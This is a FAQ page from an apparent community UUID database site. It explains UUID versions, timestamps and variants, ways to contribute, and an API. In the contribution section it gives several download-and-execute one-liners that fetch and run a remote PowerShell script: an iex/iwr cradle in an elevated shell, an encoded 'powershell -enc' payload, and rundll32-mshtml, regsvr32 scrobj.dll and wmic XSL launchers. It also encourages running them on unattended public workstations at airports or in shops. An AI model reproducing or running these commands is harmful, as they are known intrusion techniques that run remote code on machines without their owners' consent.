What it this website ?
This website is the world most complete annotated UUID database, which happens to be an index of all the numbers between 0 and 2^128.Not all the numbers between 0 and 2^128 are RFC4122-compliant, but all are welcome in my database.
Various uses can be made of the data in here :
- As a programmer, you might be interested in finding an authoritative name for an UUID
- As a computer user, you might want to know the name of an UUID that appeared in some error log / dsdt.dsl.
- As a threat hunter, you might be interested in finding information on UUID found in event logs
- As a fellow computer scientist, you might be interested in assigning names to numbers
- As a lad interested in computer history, you might be interested in the embedded timestamps, for they sing the tale of Redmond's early wizards
How could I contribute ?"
Well, you could just add some UUID to the database !It's pretty simple, since the UUID annotation form is presented on every UUID page. You just have to access the UUID page, the URL should be https://uuid.pirate-server.com/<UUID>. Then:
- Fill the UUID name, something useful and short.
- Eventually, put some comments on the context, your sources (URL), etc.
- Feel free to sign your contribution using the "author" field in the form.
Also
You can as well use the following cURL command line :
uuid="put an actual uuid here"; title="my super uuid"; details="some comments, like: it's a cool uuid"; author="my acquisition script"; email="hello"; # advanced anti-noise technique curl --referer "https://uuid.pirate-server.com/$uuid" -XPOST --data "title=${title}&details=${details}&author=${author}&email=${email}" https://uuid.pirate-server.com/commentAlso
There's a crappy ps2exe binary here : /c.exe, just download and click. (doesn't work since the anti-noise update, I need to sort that out)
Also
I made a script to automatically push some Microsoft-related UUIDs from a Microsoft Windows operating system equipped with Microsoft PowerShell. Feel free to run the following command line in an elevated powershell instance : iex (iwr https://uuid.pirate-server.com/c).content. The code is made to be editable, and should allow one to gather more UUIDs from his own Microsoft Windows equipped detonation VM, piping the results into the function 'Out-GridView' instead of 'push'.
Should get bored at an airport or in a computer store, feel free to use the following one-liners to collect UUIDs on accessible workstations:
Works well: wmic process get name /format:"https://uuid.pirate-server.com/c.xsl" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe iex (New-Object System.Net.WebClient).DownloadString('https://uuid.pirate-server.com/c.ps1') rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://uuid.pirate-server.com/c.ps1/');" powershell -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHUAdQBpAGQALgBwAGkAcgBhAHQAZQAtAHMAZQByAHYAZQByAC4AYwBvAG0ALwBjAC4AcABzADEAJwApAA== regsvr32 /s /n /u /i:https://uuid.pirate-server.com/c.sct scrobj.dllAnother thing to know while contributing, is that the best-ranked comment gets elected as UUID name, so if you find the authoritative name for some UUID, feel free to upvote yours.
What is an UUID ?
There are a lot of links below, but if you're reading this you might want the definition right now. UUID are 128 bits identifiers, concieved to be globally unique (hence the other name for those identifiers, Globally Unique IDentifier, GUID). Their generation does not require any form of central registration authority.Their uniqueness is mostly based on the entropy embedded in the 128 bits, slightly lower than 128 bits for UUID respecting the specification, which have some bits reserved for the version.
Possible UUID versions :
- 0 - Nil UUID : Only the UUID with all zeroed bits should have this version.
- 1 - DCE RPC UUID : entropy sources are MAC address, time and a "clock id".
- 2 - DCE Security UUID - Security Extension : same as above, might include a UNIX 32bit user id in the first bytes.
- 3 - MD5 : Apart for the version bits entropy source is twofold : a 'namespace' UUID, suffixed with user-defined data are hashed with MD5.
- 4 - Random : All the bits except the version bits are random.
- 5 - SHA1 : Same as UUIDv3, but the algorithm used is SHA1.
- time-low - 32bit (also named time_low)
- time-mid - 16bit (also named time_mid)
- time-high-and-version - 16bit (also named time_hi_and_version)
- clock-seq-and-reserved - 8bit (also named clock_seq_hi_and_reserved and clk_seq_hi_res)
- clock-seq-and-low - 8bit (also named clock_seq_low and clk_seq_low)
- node - 48bit
Version and Variant
The Variant of an UUID is the number of non-zero bits in the second half of the UUID, which is after the bit 64, or starting at the first MSB of the 9th byte. (I need to check those offsets with the endianness issues). Possible values are :- 0 - Reserved, NCS backward compatibility
- 1 - RFC4122 compliant
- 2 - Reserved, Microsoft Corporation backwards compatibility
- 3 and more - reserved for future definition in RFC4122
Excellent snippets from the cryptanalysis linked below
The UUID version is defined : Ui [7] = ( Ci [7] & 0x0F ) | 0x40. Identifies belonging to RFC 4122: Ui [9] = ( Ci [9] & 0x3F ) | 0x80.The Java documentation claims that "Variant 2" UUID are "Leach-Salz", but have the good property of listing the bitmasks :
The layout of a variant 2 (Leach-Salz) UUID is as follows: The most significant long consists of the following unsigned fields: 0xFFFFFFFF00000000 time_low 0x00000000FFFF0000 time_mid 0x000000000000F000 version 0x0000000000000FFF time_hi The least significant long consists of the following unsigned fields: 0xC000000000000000 variant 0x3FFF000000000000 clock_seq 0x0000FFFFFFFFFFFF node
UUIDv0
There is only one, the NIL UUID : 00000000-0000-0000-0000-000000000000 Nil UUID .UUIDv1
Time
The timestamps embedded in the UUIDv1 and UUIDv2 are 60bit timestamps, they should be the number of 100-nanosecond intervals between the generation time and 1582-10-15 00:00:00, date of the Gregorian reform of the Christian calendar.Because Microsoft chose the 1601-01-01 00:00:00, date of the first 400-year cycle reset of the newly-applied Gregorian calendar, some UUID have been shifted by 17 years, 1 month and 15 days.
Finally, because the UNIX epoch started on 1970-01-01 00:00:00, some UUID have been miscalculated using the latter timestamp as starting point, hence having an offset of 470 years.
Those three timestamps are shown on the UUID detailed pages, as there is no canonical way to determine which timestamp starting point was used.
The RFC incorrectly states that the « rollover » date should occur « around A.D. 3400, depending on the specific algorithm used », but without considering the clock sequence entropy, the rollover will occur in three thousand years :
>>> (datetime.datetime(1582, 10, 15) + datetime.timedelta(microseconds=uuid.UUID('ffffffff-ffff-1fff-8000-000000000000').time//10)) datetime.datetime(5236, 3, 31, 21, 21, 0, 684697)
Clock sequence
This field is the third source of entropy for the UUIDv1, defined in the RFC 4122. The RFC did some attempts at defining methods to add entropy in this field, it should be considered random, and might be shared by UUID generated during the same boot of a specific operating system.UUIDv2
Those UUID are a mysterious kind. I did not find any of those during any of my researches. They have been defined by the Open Group, and were meant to be used within the DCE RPC protocol, which is still in use, mostly in Microsoft environments. (Nowadays, people tend to use JSON over HTTP, but back in the time the trend was to use undocumented binary formats and raw TCP sockets; an interoperability problem partly solved by DCE RPC.).UNIX ids
Defined for UUIDv2, those UUIDv2 are just UUIDv1 with the unix id replacing the first 4 bytes. (It's an uint32). Plus, some optional "Group / User / Domain" values, indicating which type of UID is in the first four bytes.The sec_rgy_domain_t value replaces the clock_seq_low byte, therefore is a 8-bit integer (0-255), but only three values have been defined by the specification :
typedef signed32 sec_rgy_domain_t; const signed32 sec_rgy_domain_person = 0; // uint32 = UID const signed32 sec_rgy_domain_group = 1; // uint32 = GID const signed32 sec_rgy_domain_org = 2; // does not seem to attribute meaning to the first uint32Once again, I never found any of those on the Internet, but I'm describing those here for archiving purposes.
UUIDv3
Those UUID are made of three parts :- Some entropy from a cryptographic hash, which is a MD5(namespace + content)
- The version bits (third group)
- The variant bits (fourth group)
>>> hashlib.md5(uuid.NAMESPACE_DNS.bytes + bytes("random.org","ascii")).hexdigest() 'c4ca5056bca54b3ed3bed6580842e1a4' >>> uuid.UUID(bytes=hashlib.md5(uuid.NAMESPACE_DNS.bytes + bytes("random.org","ascii")).digest()) UUID('c4ca5056-bca5-4b3e-d3be-d6580842e1a4') >>> uuid.uuid3(uuid.NAMESPACE_DNS, "random.org") UUID('c4ca5056-bca5-3b3e-93be-d6580842e1a4')
UUIDv4
Same as UUIDv3, but here the entropy is supposedly random. As usual, there are some bits (nibbles) reserved for version and variant :>>> set([(uuid.uuid4().bytes[8] >> 4) for x in range(10000)]) {8, 9, 10, 11} >>> set([(uuid.uuid4().bytes[6] >> 4) for x in range(10000)]) {4}
UUIDv5
Same as UUIDv3, but with SHA1 in lieu of the MD5.As for MD5, only the first 16 bytes of the resulting hash are picked.
Should I add all the UUIDs in the world ?
Yes, as long as they are global. Don't add disk partitions uuids specific to your hardware (even though historical hardware might have its place in this database), but add anything that anyone might want to look up online.Here are a few uncommon UUID that were added to the database :
- https://uuid.pirate-server.com/search?q=melissa the Melissa .doc document UUID, that were allegedly used to identify the author
- https://uuid.pirate-server.com/search?q=malware some more malware-related UUID
- https://uuid.pirate-server.com/search?q=00c04fd430c8 the RFC namespaces
- https://uuid.pirate-server.com/search?q=0800200c9a66 all the UUIDv1 generated by the www.famkruithof.net generator a
- https://uuid.pirate-server.com/search?q=0pad some strange "UUID" that had to be padded with zeroes to be valid, created by Microsoft.
I already made some scripts to push new UUIDs to the database, collected from various sources such as websites, source code listings, and workstations. Those scripts are listed below :
Automation script to push long lists : github gist
Automation script to push MSDN copypasted CSIDL : github gist
Automation script that contains several sources : https://uuid.pirate-server.com/c :
- Windows "Installer\UserData\*\Product" MSI UUIDs
- Windows "Active Setup\Installed Components" UUIDs
- Windows CLSIDs
- Collection of uuids from Get-CimInstance Win32_COMApplication (~clsids ?)
What about publishing data and collecting IPs ?
I don't store IP addresses except in HTTP logs, and all the data is CC-BY-NC-SA.Complete UUID list : full.txt (It's a dump from 2018-04-29, I should automate this.)
Also, for your delighted eyes, here is a full index of all the UUIDs I have: /full-index/.
Is there an API ?
Yes !- Get some UUID details as json: append ?json to an UUID URL
- Programmatically add some UUID details : POST /comment as below :
curl --referer "https://uuid.pirate-server.com/$uuid" \ -XPOST --data "title=${title}&details=${details}&author=${author}&email=${notanemail}" \ https://uuid.pirate-server.com/comment
- /resolve (that's going to change soon -- 2021-06-06) accepts PUT with zlib-compressed bytes and will yield, and returns a JSON file describing all the UUIDs built from the 16-bytes chunks :
>>> import json, uuid, zlib, requests >>> payload = zlib.compress(b''.join([uuid.UUID(x).bytes for x in [ 'd4b9d908-03bc-417c-9678-bf731d38c7cc', '5df41881-3aed-3515-88a7-2f4a814cf09e', '0e971350-4039-4a03-85fe-4c210917c26d', '531511fa-190d-5d85-8a4a-279f2f592cc7', ]])) >>> r = requests.put('https://uuid.pirate-server.com/resolve', data = payload); print(json.dumps(json.loads(r.text), indent=2)) { "5df41881-3aed-3515-88a7-2f4a814cf09e": { "uuid": "5df41881-3aed-3515-88a7-2f4a814cf09e", "version": 3, "timestamp": "2743-06-07 08:39:45", "name": "RFC4122 NS_DNS_MD5 www.example.com", "comments": [ { "note": 0, "author": "", [snip..]
What's next ?
I definitely need to implement the following features :- An API to push several UUIDs in a single HTTP call
- Maybe, implement the Adobe custom MSI UUID algorithm ? (https://www.adobe.com/devnet-docs/acrobatetk/tools/AdminGuide/identify.html)
- Maybe, add a feature to handle the custom Microsoft Office UUIDs (https://support.microsoft.com/fr-fr/help/2186281/description-of-the-numbering-scheme-for-product-code-guids-in-office-2.
- Maybe, add a feature handle those UUID5 namespaces (DNS, URL, OID, x500), maybe client-side ES as I don't want to bruteforce hashes on my server. (But I don't want to host ES here).
- Also, links to the OID info ?
- Add a browsable folder-like section so that search engines will index the data
External links
Some links about UUIDs are presented below. I would like to express my sympathy to other archivists ( Harald Tveit Alvestrand, Simon Mourier, the lad at famkruithof.net , Jason Scott from textfiles.com, as well as all the archive.org volunteers. Also, thanks to Mikołaj Zalewski for his large database (of 59052 entries) and his parsers & extractors.- http://pubs.opengroup.org/onlinepubs/9629399/apdxa.htm
- http://pubs.opengroup.org/onlinepubs/9696989899/chap5.htm#tagcjh_08_02_01_01
- http://www.alvestrand.no/objectid/
- http://www.itu.int/ITU-T/studygroups/com17/oid.html
- http://www.magnumdb.com
- http://www.oid-info.com/
- https://en.wikipedia.org/wiki/Component_Object_Model
- https://en.wikipedia.org/wiki/Object_identifier
- https://en.wikipedia.org/wiki/Universally_unique_identifier
- https://en.wikipedia.org/wiki/Uniform_Resource_Name
- https://en.wikipedia.org/wiki/LSID
- https://github.com/ec-geolink/design/blob/master/data/dataone/canonical-identifiers.md
- https://en.wikipedia.org/wiki/Globally_unique_identifier?oldid=750369376
- https://stackoverflow.com/questions/7724903/where-do-uuid-namespaces-come-from
- https://tools.ietf.org/html/draft-leach-uuids-guids-01
- https://tools.ietf.org/html/rfc4122.html
- https://www.famkruithof.net/guid-uuid-make.html
- https://www.hl7.org/oid/
- https://www.iana.org/assign/ent/num
- https://docs.oracle.com/javase/7/docs/api/java/util/UUID.html
- https://www.iso.org/standard/2229.html ISO/IEC 11578:1996 Information technology -- Open Systems Interconnection -- Remote Procedure Call (RPC)
- http://guid.us/ (code and API are not respecting the spec, beware.)
- https://msdn.microsoft.com/en-us/library/aa379322(v=vs.85).aspx UuidCreateSequential function
- https://web.archive.org/web/20120607034312/http://www.gotdotnet.ru/blogs/denish/1965 cryptanalysis of the WinAPI UuidCreate function, using CryptGenRandom.
- https://eprint.iacr.org/2007/419 Cryptanalysis of the Random Number Generator of the Windows Operating System
- https://msdn.microsoft.com/en-us/library/cc246027.aspx MSDN GUID article, containing links to the version-specific PRNG algorithms
- https://www.itu.int/rec/dologin.asp?lang=e&id=T-REC-X.667-200409-S!!PDF-E&type=items
- http://mikolajapp2.appspot.com/uuid/
- https://wutils.com
- https://segment.com/blog/a-brief-history-of-the-uuid/
- http://www.secretgeek.net/hotGuids/index.htm
- http://guessaguid.secretgeek.net/
Special kind of UUIDs
The UUID specification has been used and abused by a lot of people, and various creative uses of it were made.- Adobe software version info
- Bluetooth Service ID
- BLE (Bluetooth Low Energy) Service ID
- Microsoft : used to manually type UUIDs, forget digits, etc. (OCR them on their online docs..)
- Probably Microsoft: using hash-based UUID for MSI installers. (Embedded integrity check ?)
Sources
Sources that have been or will be integrated (most can't be complete and must be maintained):- UUID RFC examples
- Microsoft CLSID HKLM:\SOFTWARE\Classes\CLSID
- Various MSI installer UUIDs (one per program installer) HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\*\Products
- Microsoft IID
- Microsoft LIBID
- Microsoft ProgID
- Microsoft Windows Server Protocol Specification PDF contents
- Microsoft WMI Classes Get-WmiObject -Namespace $ns -List
- Microsoft Active X HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components\
- VirtualBox Class IDs, from the source code XIDL file.
- Active Directory things, form [MS-ADSC]-170915.pdf (look for cc221631)
- Microsoft COMApplication IDs, Get-CimInstance Win32_COMApplication | % { $_.AppID }
- Things from https://www.bluetooth.com/specifications/assigned-numbers/16-bit-uuids-for-members
- Bluetooth Generic Attributes 'Gatt' UUID list, maybe in https://publications.opengroup.org/c706, surely in https://www.bluetooth.com/log-in?btorgReturnURL=%2ftechnical%2fassignednumbers%2fhome.htm, damned spec paywall.
- Add some sources from this msdn link (progid, clsid(ok),
GUID Description Registry key CLSID Class identifier HKEY_CLASSES_ROOT\CLSID\{000…000} IID Interface identifier HKEY_CLASSES_ROOT\Interface\{000…000} LIBID Library identifier HKEY_CLASSES_ROOT\TypeLib\{000…000} ProgID Programmatic identifier HKEY_CLASSES_ROOT\000…000 127 blubb('CLSID'); 128 blubb('Interface'); 129 blubb('Record'); 130 blubb('TypeLib'); 131 blubb('AppID'); 132 blubb('SOFTWARE\Microsoft\HTMLHelp\2.0\LocalReg\CLSID'); 133 blubb('Wow6432Node\DirectShow\MediaObjects');
- Those things from Get-ChildItem hklm:\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\ |Out-GridView
- todo :Get-ChildItem hklm:\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes
- Parse the uuid.lib legendary file from Microsoft
- Add the OIDs from https://www.ldap.com/ldap-oid-reference
- Add the UUID of some pdf documents such as some MS specifications, and other documents. (Historically meaningful docx files ? :D )
- Add the UUID of all the software installer MSIs. This will require work
- Add the OIDs from the IANA registered OID list